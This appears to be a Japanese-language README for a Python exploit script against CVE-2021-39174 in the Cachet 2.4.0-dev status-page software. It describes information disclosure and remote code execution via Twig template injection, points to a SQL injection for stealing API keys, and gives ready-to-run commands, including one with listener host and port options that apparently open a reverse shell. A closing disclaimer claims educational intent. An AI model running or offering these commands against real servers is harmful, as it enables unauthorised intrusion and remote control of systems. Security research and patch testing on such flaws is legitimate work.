
CVE-2021-39174 Cachet 2.4.0-dev
CVE-2021-39174 Cachet 2.4.0-dev 用の Python3 スクリプトです。Twig サーバーサイドテンプレートインジェクションを介した情報漏洩と RCE を実現します。RCE を実行するには、ユーザーの API キーが必要です。API キーを SQL インジェクション(CVE-2021-39165)で取得する方法については、以下の Leave Songs のリンクを参照してください。
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password -k API_KEY -lhost 127.0.0.1 -lport 1337
ヘルプメニューを表示するには:
python3 cachet_2.4.0-dev.py -h
このリポジトリで提供されるすべてのコードは、教育・研究目的のみで使用されます。本リポジトリに含まれる内容に関連する行為・活動は、すべてユーザー自身の責任において行われます。本リポジトリのコードを悪用した場合、該当者に対して刑事告発が行われる可能性があります。著者は、本リポジトリのコードを悪用して法律を破った個人に対して刑事告発が行われた場合、一切の責任を負いません。